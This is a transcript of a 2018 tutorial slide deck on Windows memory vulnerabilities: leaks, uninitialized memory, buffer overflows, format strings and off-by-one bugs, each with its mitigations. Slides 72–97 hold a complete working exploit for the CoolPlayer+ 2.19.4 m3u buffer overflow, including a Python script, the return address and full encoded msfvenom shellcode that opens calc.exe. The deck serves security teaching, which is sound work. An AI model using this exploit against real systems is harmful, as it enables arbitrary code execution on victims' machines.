Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Memory Vulnerabilities

Memory Vulnerabilities

An introduction to the concepts of finding and exploiting Windows applications (mostly) in order to understand what are those vulnerabilities and a few ways to protect against them.

Marcelo Martins

January 20, 2018
Tweet

More Decks by Marcelo Martins

Other Decks in Technology

Transcript

  1. Memory leak, memory uninitialized, integer overflow, buffer over-read, buffer underflow,

    buffer overflow Memory Vulnerabilities Marcelo Martins exploitedbunker.com
  2. Agenda Introduction Vulnerabilities •  Memory Leak •  Memory Uninitialized • 

    Buffer Over-read •  Buffer Underflow •  Buffer Overflow Summary
  3. Introduction •  Goal •  Introduce the concepts of finding and

    exploiting Windows applications (mostly) in order to understand what are those vulnerabilities and a few ways to protect against them •  This will not be a comprehensive discussion on any of these topics because there is a lot to learn and we’re only scratching the surface •  Intended audience •  Information security professionals and software developers looking for some technical insights •  Disclaimer •  I do not endorse any form of illegal activity MEMORY VULNERABILITIES
  4. Introduction •  Memory leak happens when a computer program incorrectly

    manages memory allocations and the memory no longer needed is not released •  Buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites memory in adjacent locations •  May vary according to •  Machine architecture •  Multi-threading •  System version •  Compiler version •  Programming language •  Amount of available memory MEMORY VULNERABILITIES
  5. Introduction •  IEEE: The 2015 Top Ten Programming Languages MEMORY

    VULNERABILITIES Source: http://spectrum.ieee.org/computing/software/the-2015-top-ten-programming-languages 2015 2014
  6. Introduction •  You should know a little bit about • 

    Computer Architecture •  C coding •  Debugging •  Disassembling PREREQUISITES
  7. Introduction •  Debuggers •  Immunity Debugger 1.85 (the one used

    here) •  http://www.immunityinc.com/products/debugger/ •  OllyDbg 1.10 •  http://www.ollydbg.de/ •  Demos •  Compilation •  Windows 7 64-bit Ultimate N SP1 •  C Code compiled with GCC 4.8.1 (the one used here) •  https://sourceforge.net/downloads/mingw •  Download and execute mingw-get-setup.exe •  There may be conflict with other GCCs (e.g.: Strawberry Perl) •  Execution •  Windows 7 64-bit Ultimate N SP1 (where the images come from) DEMOS
  8. Introduction •  Setup •  Download and execute mingw-get-setup.exe •  From

    https://sourceforge.net/downloads/mingw •  On MinGW Installation Manager, select mingw32-base •  On Installation menu item, click on Apply Changes •  Compilation •  C Code compiled with GCC 4.8.1 > gcc memoryLeak.c -o memoryLeak > gcc memoryUninitialized.c -o memoryUninitialized … •  Execution > memoryLeak > memoryUninitialized … DEMOS
  9. Introduction •  Github •  Download and follow the slides • 

    https://github.com/mmartins000/memory-vulnerabilities DEMOS
  10. Agenda Introduction Vulnerabilities •  Memory Leak •  Memory Uninitialized • 

    Buffer Over-read •  Buffer Underflow •  Buffer Overflow Summary
  11. Memory Leak EXPLOITATION •  “Can I try it on OSX

    or Linux?” •  Yes, you can try. Use the same command to compile. •  Run with ./memoryLeak •  Be careful •  Check out the next two slides •  “Will all demos work on other OSes?” •  It is all about trial and error J
  12. Agenda Introduction Vulnerabilities •  Memory Leak •  Memory Uninitialized • 

    Buffer Over-read •  Buffer Underflow •  Buffer Overflow Summary
  13. Memory Uninitialized BEFORE WE START •  You may want to

    take a look at •  Assembly •  http://www.cs.virginia.edu/~evans/cs216/guides/x86.html •  Registers •  https://wiki.skullsecurity.org/Registers •  We will need to go through some basics first •  Memory Uninitialized demo will be used to provide these insights INTRODUCTION
  14. Memory Uninitialized INTRODUCTION DEBUGGER: Immunity Debugger 1.85 CPU INSTRUCTIONS MEMORY

    DUMP REGISTERS MEMORY STACK COMPILE AND OPEN memoryUninitialized.exe
  15. Memory Uninitialized INTRODUCTION DEBUGGER: CPU INSTRUCTIONS •  Right-click anywhere on

    CPU INSTRUCTIONS pane, go to View, select the module to debug •  If the executable name is not showing on menu it is probably already open
  16. Memory Uninitialized INTRODUCTION DEBUGGER: CPU INSTRUCTIONS •  Right-click anywhere on

    CPU INSTRUCTIONS pane, go to Search for, select All referenced text strings
  17. Memory Uninitialized INTRODUCTION DEBUGGER: REFERENCED STRINGS DOUBLE CLICK •  This

    window provides a list of strings found inside the executable file •  Extremely valuable to find your way inside the disassembled code •  Helps to understand what is going on inside a function
  18. Memory Uninitialized INTRODUCTION 1. SELECT 2. RIGHT-CLICK 3. SELECT Addresses,

    like 0040124B, will most likely change when restarted DEBUGGER: CPU INSTRUCTIONS
  19. Memory Uninitialized INTRODUCTION main() RETURN ADDRESS REGISTERS MEMORY STACK CPU

    INSTRUCTIONS TO NEXT CALL ON PREVIOUS SLIDE 1. RIGHT-CLICK EBP 2. Follow in Stack INSTRUCTION POINTER Before 004013E0
  20. Memory Uninitialized INTRODUCTION MEMORY STACK •  A stack is a

    contiguous block of memory containing data •  Serves to dynamically allocate the local variables used in functions, to pass parameters to the functions, and to return values from the function •  The last object placed on the stack will be the first object removed and this is commonly referred to as LIFO (last in, first out) •  The stack consists of logical stack frames that are pushed when calling a function and popped when returning
  21. Memory Uninitialized INTRODUCTION PUSH FIFO FIRST IN, FIRST OUT LIFO

    LAST IN, FIRST OUT MEMORY STACK 3 4 2 1 1 1 2 2 3 3 4 4 IN OUT IN OUT PUSH POP POP Original from: chohmann.free.fr
  22. Memory Uninitialized INTRODUCTION Function Call Process •  Caller •  Push

    parameters on the stack in reverse order •  Push return address on stack •  Jump to start of function •  Called function entry •  Push local variables on stack •  Called function exit •  Place return value (if any) in register •  Pop local variables off stack •  Jump to address at top of stack •  Caller •  Pop return address and parameters off stack
  23. Memory Uninitialized INTRODUCTION REGISTERS •  EBP: Base Pointer. Pointer to

    data on the stack (in the SS segment). It points to the bottom of the current stack frame. It is used to reference local variables. •  ESP: Stack Pointer (in the SS segment). It points to the top of the current stack frame. It is used to reference local variables. •  EIP: Instruction Pointer (holds the address of the next instruction to be executed)
  24. Memory Uninitialized INTRODUCTION REGISTERS 0028FF4C 0028FF68 MEMORY STACK Addresses will

    be different Saved EBP Stack (lower addresses) … (higher addresses) ESP Return Address Argv[1] EBP CPU INSTRUCTION: PUSH EBP Saves current EBP to restore when function terminates
  25. Memory Uninitialized INTRODUCTION 1. STEP OVER: PRESS F8 REGISTERS MEMORY

    STACK CPU INSTRUCTIONS 2. RIGHT-CLICK EBP 3. Follow in Stack EXECUTION POINT
  26. Memory Uninitialized INTRODUCTION 1. STEP OVER: PRESS F8 REGISTERS MEMORY

    STACK CPU INSTRUCTIONS 2. RIGHT-CLICK EBP 3. Follow in Stack EXECUTION POINT EBP = ESP CPU INSTRUCTION: MOV EBP, ESP
  27. Memory Uninitialized INTRODUCTION 0028FF48 = 0028FF48 REGISTERS CPU INSTRUCTION: MOV

    EBP, ESP 0028FF4C = 00401250 Address Value Addresses will be different Saved EBP Stack (lower addresses) … (higher addresses) EBP Return Address Argv[1] ESP
  28. Memory Uninitialized INTRODUCTION AND ESP, FFFFFFF0 SUB ESP, 20 Reserved

    space for variables AFTER CPU INSTRUCTIONS: REGISTERS 0028FF4C = 00401250 Address Value 0028FF48 = 0028FF20 = 766F5BC4 0028FF68 0028FF68 STEP OVER TWO TIMES AND EXECUTE SUB ESP, 20 Addresses will be different Saved EBP Stack (lower addresses) … (higher addresses) EBP Return Address Argv[1] ESP Reserved space for variables
  29. Memory Uninitialized •  Text: Executable code of the program; static

    size •  Heap: Dynamically allocated data •  Stack: Local variables, arguments, function return addresses; space allocated at the top of stack; grows and shrinks as functions are called and return MEMORY LAYOUT Text Heap Stack Free space grows grows
  30. Memory Uninitialized EXPLOITATION DEBUGGER: CPU INSTRUCTIONS STEP OVER A FEW

    TIMES PRESS F8 NOW, BACK TO memoryUninitialized.exe
  31. Memory Uninitialized EXPLOITATION COMPILER •  Changed one printf() to puts()

    •  puts() is more efficient than printf() when there is no parameter
  32. Memory Uninitialized EXPLOITATION DEBUGGER: MEMORY STACK 1. RIGHT-CLICK 2. Follow

    in Dump DEBUGGER: MEMORY DUMP LITTLE ENDIAN EXECUTION
  33. Memory Uninitialized EXPLOITATION LITTLE ENDIAN NOTATION 00 33 66 99

    99 99 66 99 66 33 99 66 33 00 00 33 66 99 00 33 66 99 00 33 66 99 Most significant byte Most significant byte Most significant byte Most significant byte Least significant byte Least significant byte Least significant byte Least significant byte
  34. Memory Uninitialized EXPLOITATION DEBUGGER: MEMORY STACK &PTR PTR 1. RIGHT-CLICK

    2. Follow in Dump DEBUGGER: MEMORY DUMP EXECUTION *PTR
  35. Memory Uninitialized SOLUTION •  malloc() reads “garbage” from memory because

    it does not erase the allocated area before it starts using it •  free() should be used after malloc() •  calloc() zeroes the area that will be allocated by the program and is a better solution that malloc() •  memset() may be used to “erase” that portion of memory (or overwrite it, using a selected char)
  36. Agenda Introduction Vulnerabilities •  Memory Leak •  Memory Uninitialized • 

    Buffer Over-read •  Buffer Underflow •  Buffer Overflow Summary
  37. Buffer Over-read Solutions depend on the language used •  Use

    only functions that verify the size of what is being copied •  Functions that DO NOT verify: gets(), strcpy(), strcat(), sprintf(), vsprintf(), scanf(), sscanf(), fscanf() •  Functions that should be used: strncpy(), strlcpy() and strlcat() •  Use functions that “end” a string with null char, as the functions above SOLUTION
  38. Agenda Introduction Vulnerabilities •  Memory Leak •  Memory Uninitialized • 

    Buffer Over-read •  Buffer Underflow •  Buffer Overflow Summary
  39. Agenda Introduction Vulnerabilities •  Memory Leak •  Memory Uninitialized • 

    Buffer Over-read •  Buffer Underflow •  Buffer Overflow Summary
  40. Buffer Overflow •  Buffer •  Contiguous memory associated with a

    variable or field •  Common in C code •  All strings are NUL-terminated array of chars INTRODUCTION
  41. Buffer Overflow •  Integer Overflow •  Stack Overflow •  Demo

    0: program crash •  Demo 1: buffer overwrite •  Demo 2: dead function call •  Demo 3: shellcode execution •  Format String •  Off-by-one Overflow AGENDA
  42. Stack Overflow EXPLOITATION 0 DEBUGGER: CPU INSTRUCTIONS •  Right-click anywhere

    on CPU INSTRUCTIONS pane, go to View, select the module to debug •  If the executable name is not showing on menu it is probably already open
  43. Stack Overflow EXPLOITATION 0 DEBUGGER: CPU INSTRUCTIONS •  Right-click anywhere

    on CPU INSTRUCTIONS pane, go to Search for, select All referenced text strings
  44. Stack Overflow EXPLOITATION 0 DEBUGGER: CPU INSTRUCTIONS 2. SELECT AND

    PRESS F2 1. WE LAND HERE TO SET BREAKPOINT: USER COMMENTS: PRESS ; 3. RUN! PRESS F9 UNTIL YOU REACH THE BREAKPOINT
  45. Stack Overflow EXPLOITATION 0 DEBUGGER: CPU INSTRUCTIONS STEP OVER (F8)

    UNTIL THIS POINT MEMORY STACK REGISTERS ESP ESP + 18: garbage NOT YET EXECUTED
  46. Stack Overflow EXPLOITATION 0 DEBUGGER: CPU INSTRUCTIONS STEP OVER (F8)

    ONE MORE TIME MEMORY STACK REGISTERS ESP ESP + 18: “B” EXECUTED
  47. Stack Overflow EXPLOITATION 0 DEBUGGER: CPU INSTRUCTIONS STEP OVER (F8)

    PAST NULL CHAR MEMORY STACK REGISTERS ESP ESP + 18 ESP + 10
  48. Stack Overflow EXPLOITATION 0 LOADS ADDR BUFFER1 LOADS ADDR BUFFER2

    LOADS ADDR BUFFER1 LOADS ADDR BUFFER2 DEBUGGER: CPU INSTRUCTIONS
  49. Stack Overflow EXPLOITATION 0 [EBP + C] 28FF48 + C

    (12) = 28FF5A •  EAX: Main register used in arithmetic calculations. Also known as accumulator, as it holds results of arithmetic operations and function return values.
  50. Stack Overflow EXPLOITATION 0 LOADS ADDR BUFFER2 INTO EAX MOV

    ADDR ARG INTO EAX DEBUGGER: CPU INSTRUCTIONS STEP OVER (F8) THREE TIMES DIFF: LEA and MOV
  51. Stack Overflow EXPLOITATION 0 Saved EBP Stack (lower addresses) …

    (higher addresses) EBP Return Address Argv[1] ESP BUFF ER2 BUFF ER1
  52. Stack Overflow EXPLOITATION 0 RETURN ADDRESS Stack (lower addresses) …

    (higher addresses) EBP Argv[1] ESP abcd efgh ijkl mnop qrst uvwx yz01 2
  53. Stack Overflow EXPLOITATION 0 DEBUGGER: MEMORY STACK } BUFFER2 }

    BUFFER1 32 00 40 00 32 = 2 00 = null char 40 = @ RET EBP ESP
  54. Stack Overflow It isn’t that hard to spot a buffer

    overflow possibility •  Source code •  Disassembled code SOLUTION 0
  55. Stack Overflow Solutions depend on the language used •  Use

    only functions that verify the size of what is being copied •  Functions that DO NOT verify: gets(), strcpy(), strcat(), sprintf(), vsprintf(), scanf(), sscanf(), fscanf() •  Functions that should be used: strncpy(), strlcpy() and strlcat() •  Use functions that “end” a string with null char, as the functions above SOLUTION 0
  56. Buffer Overflow •  Integer Overflow •  Stack Overflow •  Demo

    0: program crash •  Demo 1: buffer overwrite •  Demo 2: dead function call •  Demo 3: shellcode execution •  Format String •  Off-by-one Overflow AGENDA
  57. Stack Overflow DEBUGGER: CPU INSTRUCTIONS •  Right-click anywhere on CPU

    INSTRUCTIONS pane, go to View, select the module to debug •  If the executable name is not showing on menu it is probably already open Compile and open buffer1.exe DEMO 1: EXPLOITATION
  58. Stack Overflow DEBUGGER: CPU INSTRUCTIONS •  Right-click anywhere on CPU

    INSTRUCTIONS pane, go to Search for, select All referenced text strings DEMO 1: EXPLOITATION
  59. Stack Overflow DEBUGGER: CPU INSTRUCTIONS 2. SELECT AND PRESS F2

    1. WE LAND HERE TO SET BREAKPOINT: 3. RUN! PRESS F9 UNTIL YOU REACH THE BREAKPOINT DEMO 1: EXPLOITATION
  60. Stack Overflow DEBUGGER: CPU INSTRUCTIONS DEBUGGER: MEMORY STACK [ESP +

    2C] 28FF10 + 2C = 28FF3C Compares 28FF3C with 0 DEMO 1: EXPLOITATION
  61. Stack Overflow DEBUGGER: CPU INSTRUCTIONS •  ESP = 22FF10 • 

    ESP+2C = 28FF3C •  28FF3C holds 0 •  if ESP+2C = 0, jump to LEAVE •  Will jump over “if (pass)” block which contains the message we want to see NO PROBLEM WILL JUMP: THE LINE IS CYAN DEMO 1: EXPLOITATION
  62. Stack Overflow DEBUGGER: CPU INSTRUCTIONS DEBUGGER: MEMORY STACK [ESP +

    2C] 28FF10 + 2C = 28FF3C Compares 28FF3C with 0 28FF3C = 70 “p” DEMO 1: EXPLOITATION
  63. Stack Overflow HOW IT WORKS •  ESP = 22FF10 • 

    ESP+2C = 28FF3C •  28FF3C holds 70 DEMO 1: EXPLOITATION if True False == 0 True != 0 70 != 0 True
  64. Stack Overflow DEMO 1: EXPLOITATION DEBUGGER: CPU INSTRUCTIONS •  ESP

    = 22FF10 •  ESP+2C = 28FF3C •  28FF3C holds 70 •  if ESP+2C = 0, jump to LEAVE •  Will NOT jump over “if (pass)” block which contains the message we want to see •  The message will be displayed BUFFER OVERFLOW! WON’T JUMP: THE LINE IS GRAY
  65. Buffer Overflow •  Integer Overflow •  Stack Overflow •  Demo

    0: program crash •  Demo 1: buffer overwrite •  Demo 2: dead function call •  Demo 3: shellcode execution •  Format String •  Off-by-one Overflow AGENDA
  66. Stack Overflow DEMO 2: INTRODUCTION 0040143A Goal: change RET address

    to Address will probably be different calling a dead function or any other function Stack (lower addresses) … (higher addresses) EBP Argv[1] ESP abcd efgh ijkl mnop qrst uvwx yz01 <address> RETURN ADDRESS
  67. Stack Overflow DEMO 2: EXPLOITATION COMPILE AND OPEN buffer2-exploit.exe Search

    for “buffer2.exe” as a referenced string DEBUGGER: CPU INSTRUCTIONS
  68. Stack Overflow SHELLCODE •  Assembly instruction, written in hex • 

    Cannot contain •  Null chars (0x00), carriage return (0x0D), line feed (0x0A), 0xFF •  0x0B, 0x0C: stop string %s processing when read by sscanf() •  In other cases you may only be allowed to use alphanumeric chars, for example DEMO 2: EXPLOITATION
  69. Stack Overflow Solutions depend on the language used •  Use

    only functions that verify the size of what is being copied •  Functions that DO NOT verify: gets(), strcpy(), strcat(), sprintf(), vsprintf(), scanf(), sscanf(), fscanf() •  Functions that should be used: strncpy(), strlcpy() and strlcat() •  Use functions that “end” a string with null char, as the functions above DEMO 2: SOLUTION
  70. Buffer Overflow •  Integer Overflow •  Stack Overflow •  Demo

    0: program crash •  Demo 1: buffer overwrite •  Demo 2: dead function call •  Demo 3: shellcode execution •  Format String •  Off-by-one Overflow AGENDA
  71. Stack Overflow •  Jump Shellcode •  A executable code will

    be provided with the strings that will be read into the buffer •  A jump must be constructed to read and execute this shellcode •  It is possible to do anything with this shellcode, from opening calc.exe to creating new users •  The target of the shellcode will be executed as the user that executed the vulnerable software •  Requirements •  Python 2.7 32-bit (latest version) •  Metasploit or Mona plugin for Immunity Debugger 1.83+ DEMO 3: INTRODUCTION
  72. Stack Overflow DEMO 3: EXPLOITATION •  CoolPlayer+ •  Vulnerable version:

    2.19.4 •  Actual (latest) version: 2.19.4 (from 05 Nov 2013) •  Exploit published in 15 Nov 2013 •  m3u file buffer overflow •  https://www.exploit-db.com/exploits/29613/ •  Download executable from link above •  Update •  This demo is based on a tutorial published at http://www.securitysift.com/windows- exploit-development-part-4-locating-shellcode-jumps/ •  Jump address changed to run on Windows 7 64-bit Ultimate N •  Ported/rewritten from Perl to Python •  Metasploit commands were updated
  73. Stack Overflow DEMO 3: EXPLOITATION Goal: find EIP to overflow

    Then, call shellcode Stack (lower addresses) … (higher addresses) EBP ESP Aa0A a1Aa 2Aa3 Aa4A a5Aa 6Aa7 Aa8A a9Ab 0Ab1 .... EIP
  74. Stack Overflow DEMO 3: EXPLOITATION •  Generating the pattern to

    fill the buffer •  Using Metasploit •  Run /usr/share/metasploit-framework/tools/ pattern_create.rb <buffer size> •  Select the pattern and copy to clipboard (CTRL+C)
  75. Stack Overflow DEMO 3: EXPLOITATION •  Generating the pattern to

    fill the buffer •  Using Mona inside Immunity Debugger 1.83+ •  Run !mona pc 10000 •  Copy the pattern FROM FILE to clipboard (CTRL+C) Logs: ALT+L
  76. Stack Overflow DEMO 3: EXPLOITATION #!/usr/bin/python file="coolplayer_try.m3u” junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6

    Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A d4Ad5Ad6Ad7………” f=open(file,"w") f.write(junk) f.close() Write to file Paste the pattern here coolplayer_try.py
  77. Stack Overflow DEMO 3: EXPLOITATION •  What do we have

    so far? •  A Python script that will create a m3u file that contains 10000 bytes •  Filename will be coolplayer_try.m3u •  The file will contain a sequence of characters, a pattern, that will fill the buffer causing a buffer overflow
  78. Stack Overflow DEMO 3: EXPLOITATION Copy coolplayer folder to C:\

    Run C:\coolplayer\App\coolplayer+\coolplayer+.exe
  79. Stack Overflow DEMO 3: EXPLOITATION Let’s try a quick test

    •  Press CTRL+O to open a file •  Select the m3u file we just created with our Python script •  You’ll get this window Interesting!
  80. Stack Overflow DEMO 3: EXPLOITATION Go to menu Debug, select

    Arguments Keep exploit files on root folder RESTART: CTRL+F2
  81. Stack Overflow DEMO 3: EXPLOITATION •  On Immunity Debugger • 

    After changing the argument to point to the exploit file (coolplayer_try.m3u), press CTRL+F2 to restart •  Press F9 (RUN) twice •  Wait a few seconds, less than a minute •  You will see the registers and memory stack as shown on next slide
  82. Stack Overflow DEMO 3: EXPLOITATION MEMORY STACK •  EDX points

    to the beginning of the string •  EBX also points to the beginning of the string but contains a much longer portion of it •  EIP is the Exception Offset shown 3 slides ago. ESP is next Addresses will probably be different
  83. Stack Overflow DEMO 3: EXPLOITATION •  Find the pattern offset

    •  How many characters does it take to reach that address (EIP)? •  Using Metasploit •  Run /usr/share/metasploit-framework/tools/ pattern_offset.rb <EIP address> <buffer size>
  84. Stack Overflow DEMO 3: EXPLOITATION •  What do we have

    so far? •  It takes 260 chars to get to EIP (offset) •  EIP takes 4 bytes (or 4 chars) •  Could hold one instruction, or two •  If I could call EBX I could access the beginning of the string •  Must be an executable address to “call EBX” •  I have plenty of space in this string to store my code, after EIP •  Before EIP I have only 260 bytes!
  85. Stack Overflow DEMO 3: EXPLOITATION Goal: run shellcode Stack (lower

    addresses) NOPs SHELLCODE NOPs (higher addresses) EBP ESP MOVE EBX TO A POINT AFTER EIP JUMP TO EBX (fill with junk until EIP) EIP CALL EBX 260 bytes } EBX Points to the beginning of the string
  86. Stack Overflow DEMO 3: EXPLOITATION •  Find a CALL EBX

    •  Run !mona find -type instr -s "call ebx" Address 0x7522eb9a from kernel32.dll was chosen from find.txt Logs: ALT+L
  87. Stack Overflow DEMO 3: EXPLOITATION •  Increase EBX to get

    past EIP •  Run /usr/share/metasploit-framework/tools/metasm_shell.rb Cannot contain 00 Will interrupt processing Could “add 100” 3 times Metasm converts Assembly instructions into opcodes header = "\x83\xc3\x64" * 3 #(100 * 3 = 300)
  88. Stack Overflow DEMO 3: EXPLOITATION •  After increasing EBX, we

    will use an instruction to jump to this new address •  Fill the buffer with junk until EIP •  junk = "\x41" * (260 - len(header)) #0x41 = “A” •  Insert into EIP the instruction that will take us to the beginning •  eip = little_endian(0x7522eb9a) #call ebx •  After EIP, insert some NOPs to give it a little room •  nops = "\x90" * 100 header += "\xff\xe3"
  89. Stack Overflow DEMO 3: EXPLOITATION Goal: run shellcode Stack (lower

    addresses) NOPs SHELLCODE NOPs (higher addresses) EBP ESP ADD EBX, 100 ADD EBX, 100 ADD EBX, 100 JMP EBX (fill with junk until EIP) EIP CALL EBX 260 bytes } EBX EBX 300 bytes offset
  90. Stack Overflow DEMO 3: EXPLOITATION BEGIN OF FILE #!/usr/bin/python import

    struct def little_endian(address): return struct.pack("<L",address) file="coolplayer_exploit.m3u" buffer=10000 header = "\x83\xc3\x64" * 3 #(100 * 3 = 300) header += "\xff\xe3" junk = "\x41" * (260 - len(header)) #offset to eip eip = little_endian(0x7522eb9a) #call ebx nops = "\x90" * 100 coolplayer_exploit.py
  91. Stack Overflow DEMO 3: EXPLOITATION SHELLCODE •  To generate the

    shellcode that will open calc.exe •  Run msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b ‘\x00\x0a\x0d\xff’ -e x86/shikata_ga_nai -f python •  The shellcode (buf) will be reformatted on next slide
  92. Stack Overflow DEMO 3: EXPLOITATION MIDDLE OF FILE shell =

    ( "\xb8\x4d\x25\x9c\x45\xdb\xcf\xd9\x74\x24\xf4\x5a\x29" "\xc9\xb1\x31\x31\x42\x13\x83\xea\xfc\x03\x42\x42\xc7" "\x69\xb9\xb4\x85\x92\x42\x44\xea\x1b\xa7\x75\x2a\x7f" "\xa3\x25\x9a\x0b\xe1\xc9\x51\x59\x12\x5a\x17\x76\x15" "\xeb\x92\xa0\x18\xec\x8f\x91\x3b\x6e\xd2\xc5\x9b\x4f" "\x1d\x18\xdd\x88\x40\xd1\x8f\x41\x0e\x44\x20\xe6\x5a" "\x55\xcb\xb4\x4b\xdd\x28\x0c\x6d\xcc\xfe\x07\x34\xce" "\x01\xc4\x4c\x47\x1a\x09\x68\x11\x91\xf9\x06\xa0\x73" "\x30\xe6\x0f\xba\xfd\x15\x51\xfa\x39\xc6\x24\xf2\x3a" "\x7b\x3f\xc1\x41\xa7\xca\xd2\xe1\x2c\x6c\x3f\x10\xe0" "\xeb\xb4\x1e\x4d\x7f\x92\x02\x50\xac\xa8\x3e\xd9\x53" "\x7f\xb7\x99\x77\x5b\x9c\x7a\x19\xfa\x78\x2c\x26\x1c" "\x23\x91\x82\x56\xc9\xc6\xbe\x34\x87\x19\x4c\x43\xe5" "\x1a\x4e\x4c\x59\x73\x7f\xc7\x36\x04\x80\x02\x73\xfa" "\xca\x0f\xd5\x93\x92\xc5\x64\xfe\x24\x30\xaa\x07\xa7" "\xb1\x52\xfc\xb7\xb3\x57\xb8\x7f\x2f\x25\xd1\x15\x4f" "\x9a\xd2\x3f\x2c\x7d\x41\xa3\x9d\x18\xe1\x46\xe2")
  93. Stack Overflow DEMO 3: EXPLOITATION END OF FILE exploit =

    junk + eip + nops + shell footer = "\x90" * (buffer - len(exploit)) f=open(file,"w") f.write(header + exploit + footer) f.close() Write to file Concatenates the variables Fills the rest of the buffer
  94. Stack Overflow DEMO 3: EXPLOITATION Go to menu Debug, select

    Arguments Keep exploit files on root folder
  95. Stack Overflow DEMO 3: EXPLOITATION •  On Immunity Debugger • 

    After changing the argument to point to the exploit file (coolplayer_exploit.m3u), press CTRL+F2 to restart •  Press F9 (RUN) twice •  Wait a few seconds, less than a minute •  Calc.exe should be executed •  Memory stack will show •  NOPs •  Shellcode •  On command prompt •  Run Coolplayer+.exe •  Open coolplayer_exploit.m3u •  Calc.exe will open, Coolplayer will close MEMORY STACK
  96. Stack Overflow DEMO 3: EXPLOITATION •  Because payload (shellcode) has

    only 220 bytes, it would fit before EIP •  Let’s try another version of the exploit •  Insert shellcode at the beginning, before EIP •  Fill the buffer with NOPs until EIP •  nops = "\x90" * (260 – len(shell)) #offset eip •  Insert into EIP the instruction that will take us to the beginning •  eip = little_endian(0x7522eb9a) #call ebx •  Change the order of variable exploit •  exploit = shell + nops + eip •  footer = "\x90" * (buffer - len(exploit)) Solution #2
  97. Stack Overflow DEMO 3: EXPLOITATION Goal: run shellcode Stack (lower

    addresses) NOPs (higher addresses) EBP ESP SHELLCODE (fill with NOPs until EIP) . . . . . EIP CALL EBX 260 bytes } EBX Solution #2
  98. Buffer Overflow •  Integer Overflow •  Stack Overflow •  Format

    String •  Demo 0: program crash / view stack •  Off-by-one Overflow AGENDA
  99. Format String •  The Format Family INTRODUCTION function action fprintf

    Prints to a FILE stream printf Prints to the stdout stream sprintf Prints into a string snprintf Prints to a string with length checking vfprintf Prints to a FILE stream from a va_arg structure vprintf Prints to stdout from a va_arg structure vsprintf Prints to a string from a va_arg structure vsnprintf Prints to a string with length checking from a va_arg structure
  100. Format String •  The Format String INTRODUCTION parameter output passed

    as %d decimal (int) value %u unsigned decimal (unsigned int) value %x hexadecimal (unsigned int) value %s string ((const) (unsigned) char *) reference %n number of bytes written so far, (* int) reference
  101. Format String INTRODUCTION ESP ESP+4 ESP+8 ESP+C MEMORY STACK CPU

    INSTRUCTIONS ESP+18 MOV LEA FROM memoryUninitialized.exe RET EBP
  102. Buffer Overflow •  Integer Overflow •  Stack Overflow •  Format

    String •  Demo 0: program crash / view stack •  Off-by-one Overflow AGENDA
  103. Format String DEMO 0: EXPLOITATION •  An attacker may try

    to crash a daemon to observe sensitive information on its crashing output
  104. Off-by-one Overflow EXPLOITATION DEBUGGER: MEMORY STACK ESP MEMORY STACK EBP

    RET EBP-C EBP-10 EBP-18 EBP+8 ESP+4 ESP+8 auth i argv buffer
  105. Agenda Introduction Vulnerabilities •  Memory Leak •  Memory Uninitialized • 

    Buffer Over-read •  Buffer Underflow •  Buffer Overflow Summary
  106. Summary •  Dr. Memory (Free, open source software) •  http://www.drmemory.org/

    •  Windows, Linux or Mac •  Their words: Dr. Memory is a memory monitoring tool capable of identifying memory-related programming errors such as accesses of uninitialized memory and accesses to unaddressable memory •  Visual Code Grepper (Free, open source software) •  sourceforge.net/projects/visualcodegrepp •  Windows •  Their words: VCG is an automated code security review tool for C++, C#, VB, PHP, Java and PL/SQL which is intended to drastically speed up the code review process by identifying bad/ insecure code. WITH A LITTLE HELP FROM MY FRIENDS
  107. Summary •  Dr. Memory (memoryLeak.exe) •  Error #1: LEAK 8000

    direct bytes 0x00d41d10-0x00d43c50 + 0 indirect bytes •  # 0 replace_malloc [d:\drmemory_package\common\alloc_replace.c:2384] •  # 1 wasteMemory •  # 2 main •  Dr. Memory (memoryUninitialized.exe) •  Error #2: LEAK 4 direct bytes 0x00cd1e08-0x00cd1e0c + 0 indirect bytes •  # 0 replace_malloc [d:\drmemory_package\common\alloc_replace.c:2384] •  # 1 main WITH A LITTLE HELP FROM MY FRIENDS
  108. Summary •  Stack analysis of source code to find overflows

    •  Black-box testing with long strings •  Modern compilers and languages implement security controls to avoid these vulnerabilities •  GCC: -fstack-protector, –fstack-protector •  Linux: sudo echo 1 > /proc/sys/kernel/randomize_va_space •  Use a Canary as an insurance policy •  Security by design: design from the ground up to be secure. Start thinking about security since phase 1 HOW TO PROCEED
  109. References •  Tutorials •  Security Sift •  http://www.securitysift.com/windows-exploit-development-part-1-basics/ •  FuzzySecurity

    •  http://www.fuzzysecurity.com/tutorials/expDev/1.html •  Corelan •  https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial- part-1-stack-based-overflows/ LOOKING FOR MORE?
  110. References •  Tools •  Immunity Debugger •  http://www.immunityinc.com/products/debugger/ •  Mona.py

    •  https://github.com/corelan/mona •  Metasploit •  http://www.metasploit.com/ •  Exploits (to study BOs) •  Exploit-DB •  https://www.exploit-db.com/ LOOKING FOR MORE?